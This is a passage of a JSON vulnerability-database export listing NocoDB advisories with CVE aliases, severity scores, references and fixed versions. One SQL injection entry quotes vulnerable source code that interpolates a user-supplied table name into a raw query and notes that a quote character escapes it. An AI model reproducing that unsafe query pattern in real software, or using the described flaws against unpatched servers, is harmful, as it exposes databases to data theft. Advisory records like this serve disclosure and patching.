(bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28396","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.12999","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28396"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:16Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-x4vh-j75g-268g","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:16Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-x4vh-j75g-268g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28396","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28396"},{"reference_url":"https://github.com/advisories/GHSA-x4vh-j75g-268g","reference_id":"GHSA-x4vh-j75g-268g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x4vh-j75g-268g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28396","GHSA-x4vh-j75g-268g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vs5e-zmcs-8kam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35640?format=json","vulnerability_id":"VCID-x6m1-a44z-u3bd","summary":"Improper Input Validation in nocodb\nImproper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5104","reference_id":"","reference_type":"","scores":[{"value":"0.00816","scoring_system":"epss","scoring_elements":"0.74601","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5104"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/db0385cb8aab2a34e233454607f59152ac62b3e2","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-24T16:35:44Z/"}],"url":"https://github.com/nocodb/nocodb/commit/db0385cb8aab2a34e233454607f59152ac62b3e2"},{"reference_url":"https://huntr.dev/bounties/1b5c6d9f-941e-4dd7-a964-42b53d6826b0","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-24T16:35:44Z/"}],"url":"https://huntr.dev/bounties/1b5c6d9f-941e-4dd7-a964-42b53d6826b0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5104","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5104"},{"reference_url":"https://github.com/advisories/GHSA-xrpm-hccg-28x7","reference_id":"GHSA-xrpm-hccg-28x7","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-xrpm-hccg-28x7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67817?format=json","purl":"pkg:npm/nocodb@0.96.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.96.0"}],"aliases":["CVE-2023-5104","GHSA-xrpm-hccg-28x7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x6m1-a44z-u3bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53282?format=json","vulnerability_id":"VCID-x94j-rear-qub2","summary":"NocoDB information disclosure vulnerability\nIn NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2062","reference_id":"","reference_type":"","scores":[{"value":"0.01251","scoring_system":"epss","scoring_elements":"0.79644","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2062"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/a18f5dd53811b9ec1c1bb2fdbfb328c0c87d7fb4","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/a18f5dd53811b9ec1c1bb2fdbfb328c0c87d7fb4"},{"reference_url":"https://huntr.dev/bounties/35593b4c-f127-4699-8ad3-f0b2203a8ef6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/35593b4c-f127-4699-8ad3-f0b2203a8ef6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2062","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2062"},{"reference_url":"https://github.com/advisories/GHSA-mx8q-jqwm-85mv","reference_id":"GHSA-mx8q-jqwm-85mv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mx8q-jqwm-85mv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/95317?format=json","purl":"pkg:npm/nocodb@0.91.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ctkq-rnus-b7au"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-g4yf-skds-f3e8"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-xfv1-m6rg-5ka5"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.7"}],"aliases":["CVE-2022-2062","GHSA-mx8q-jqwm-85mv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x94j-rear-qub2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53269?format=json","vulnerability_id":"VCID-xfv1-m6rg-5ka5","summary":"Insufficient Session Expiration in NocoDB\nInsufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2064","reference_id":"","reference_type":"","scores":[{"value":"0.00311","scoring_system":"epss","scoring_elements":"0.54468","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2064"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/c9b5111b25aea2781e19395a8e9107ddbd235a2b","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/c9b5111b25aea2781e19395a8e9107ddbd235a2b"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2262","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2338","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2338"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.91.9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.91.9"},{"reference_url":"https://huntr.dev/bounties/39523d51-fc5c-48b8-a082-171da79761bb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/39523d51-fc5c-48b8-a082-171da79761bb"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2064","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2064"},{"reference_url":"https://github.com/advisories/GHSA-6293-2vg2-pmp5","reference_id":"GHSA-6293-2vg2-pmp5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6293-2vg2-pmp5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/94585?format=json","purl":"pkg:npm/nocodb@0.91.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.9"}],"aliases":["CVE-2022-2064","GHSA-6293-2vg2-pmp5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xfv1-m6rg-5ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48695?format=json","vulnerability_id":"VCID-ycfk-e7rx-nqhc","summary":"NocoDB vulnerable to Denial of Service\nNocoDB prior to 0.92.0 allows actors to insert large characters into the input field `New Project` on the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3423","reference_id":"","reference_type":"","scores":[{"value":"0.01059","scoring_system":"epss","scoring_elements":"0.77926","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3423"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/000ecd886738b965b5997cd905825e3244f48b95","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/000ecd886738b965b5997cd905825e3244f48b95"},{"reference_url":"https://huntr.dev/bounties/94639d8e-8301-4432-ab80-e76e1346e631","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/94639d8e-8301-4432-ab80-e76e1346e631"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3423","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3423"},{"reference_url":"https://github.com/advisories/GHSA-grv6-m753-3w2g","reference_id":"GHSA-grv6-m753-3w2g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-grv6-m753-3w2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/84203?format=json","purl":"pkg:npm/nocodb@0.92.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.92.0"}],"aliases":["CVE-2022-3423","GHSA-grv6-m753-3w2g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ycfk-e7rx-nqhc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14591?format=json","vulnerability_id":"VCID-ykcq-ue1s-xbd5","summary":"NocoDB SQL Injection vulnerability\n### Summary\n---\nAn authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.\n\n### Details\n---\n### SQL Injection vulnerability occurs in **VitessClient.ts**.\n```javascript\nasync columnList(args: any = {}) {\n    const func = this.columnList.name;\n    const result = new Result();\n    log.api(`${func}:args:`, args);\n\n    try {\n      args.databaseName = this.connectionConfig.connection.database;\n\n      const response = await this.sqlClient.raw(\n        `select *, table_name as tn from information_schema.columns where table_name = '${args.tn}' ORDER by ordinal_position`,\n      );\n```\nThe variable **${args.tn}** refers to the table name entered by the user.\nA malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.\n\n### Impact\n---\nThis vulnerability may result in leakage of sensitive data in the database.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-50718","reference_id":"","reference_type":"","scores":[{"value":"0.00231","scoring_system":"epss","scoring_elements":"0.45977","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-50718"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-13T20:17:19Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-50718","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-50718"},{"reference_url":"https://github.com/advisories/GHSA-8fxg-mr34-jqr8","reference_id":"GHSA-8fxg-mr34-jqr8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fxg-mr34-jqr8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41780?format=json","purl":"pkg:npm/nocodb@0.202.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.202.10"}],"aliases":["CVE-2023-50718","GHSA-8fxg-mr34-jqr8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykcq-ue1s-xbd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21300?format=json","vulnerability_id":"VCID-z9nq-zv94-syhg","summary":"NocoDB Missing Ownership Validation in MCP Token Operations\n### Summary\nThe MCP token service did not validate token ownership, allowing a Creator within the same base to read, regenerate, or delete another user's MCP tokens if the token ID was known.\n\n### Details\n`McpTokenService.get()`, `regenerateToken()`, and `delete()` did not filter by `fk_user_id`. The analogous `ApiTokensService` correctly enforced ownership.\n\n### Impact\nLimited — requires Creator role and knowledge of target token ID. Primary risk is denial of service (invalidating tokens) and scoped token disclosure.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) (bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28361","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17046","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28361"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:48Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-p9x3-w98f-7j3q","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:48Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-p9x3-w98f-7j3q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28361","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28361"},{"reference_url":"https://github.com/advisories/GHSA-p9x3-w98f-7j3q","reference_id":"GHSA-p9x3-w98f-7j3q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p9x3-w98f-7j3q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-